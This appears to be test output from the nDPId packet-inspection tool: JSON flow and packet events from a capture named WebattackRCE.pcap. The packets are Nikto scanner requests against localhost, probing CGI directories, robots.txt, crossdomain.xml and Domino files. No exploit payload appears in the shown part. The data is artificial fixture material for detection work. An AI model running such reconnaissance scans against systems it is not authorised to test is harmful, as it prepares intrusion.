01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-exe\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276725,"pkt":"AAAAAAAAAAAAAAAACABFAADFFmlAAEAGJch\/AAABfwAAAcHgH5D+Si57PKwG0oAYAED+uQAAAQEICp1m+x2dZvsdR0VUIC9jZ2ktaG9tZS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-home\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276727,"pkt":"AAAAAAAAAAAAAAAACABFAADFtaJAAEAGho5\/AAABfwAAAcHiH5DFGI2++SyH14AYAED+uQAAAQEICp1m+x+dZvsfR0VUIC9jZ2ktcGVybC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-perl\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276728,"pkt":"AAAAAAAAAAAAAAAACABFAADFuPZAAEAGgzp\/AAABfwAAAcHkH5CSdoDrZ1cRi4AYAED+uQAAAQEICp1m+yCdZvsgR0VUIC9zY2dpLWJpbi8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276730,"pkt":"AAAAAAAAAAAAAAAACABFAADIS5pAAEAG8JN\/AAABfwAAAcHmH5DcbnOH9ynG7oAYAED+vAAAAQEICp1m+yKdZvsiR0VUIC9jZ2ktYmluLXNkYi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin-sdb\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276733,"pkt":"AAAAAAAAAAAAAAAACABFAADE3RFAAEAGXyB\/AAABfwAAAcHoH5BtNeURIEAjc4AYAED+uAAAAQEICp1m+ySdZvskR0VUIC9jZ2ktbW9kLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-mod\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1576420276734,"pkt":"AAAAAAAAAAAAAAAACABFAAC0+gVAAEAGQjx\/AAABfwAAAcHqH5Dwf8IdIiKU7IAYAED+qAAAAQEICp1m+yadZvsmR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnBhdGhzKQ0KDQo="}
01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:paths)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1576420276738,"pkt":"AAAAAAAAAAAAAAAACABFAADXryVAAEAGjPl\/AAABfwAAAcHsH5B635cEZT8z4YAYAED+ywAAAQEICp1m+yqdZvsqR0VUIC9jbGllbnRhY2Nlc3Nwb2xpY3kueG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjbGllbnRhY2Nlc3Nwb2xpY3kpDQoNCg=="}
01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/clientaccesspolicy.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:clientaccesspolicy)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276739,"pkt":"AAAAAAAAAAAAAAAACABFAADJlTdAAEAGpvV\/AAABfwAAAcHuH5Dvz60WkSjxAoAYAED+vQAAAQEICp1m+yudZvsrR0VUIC9jcm9zc2RvbWFpbi54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNyb3NzZG9tYWluKQ0KDQo="}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:crossdomain)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276741,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/JMVAAEAGF3J\/AAABfwAAAcHwH5DeWhzjQtAeBoAYAED+swAAAQEICp1m+yydZvssR0VUIC9yb2JvdHMudHh0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpyb2JvdHMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/robots.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:robots)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276742,"pkt":"AAAAAAAAAAAAAAAACABFAADJFcxAAEAGJmF\/AAABfwAAAcHyH5BqYy3sS9mo74AYAED+vQAAAQEICp1m+y6dZvsuR0VUIC9kb21jZmcubnNmIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RG9taW5vIGRldGVjdGlvbikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/domcfg.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276743,"pkt":"AAAAAAAAAAAAAAAACABFAADIxjhAAEAGdfV\/AAABfwAAAcH0H5Bv5P4Yg+7934AYAED+vAAAAQEICp1m+y+dZvsvR0VUIC9hZG1pbi5uc2YgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRvbWlubyBkZXRlY3Rpb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
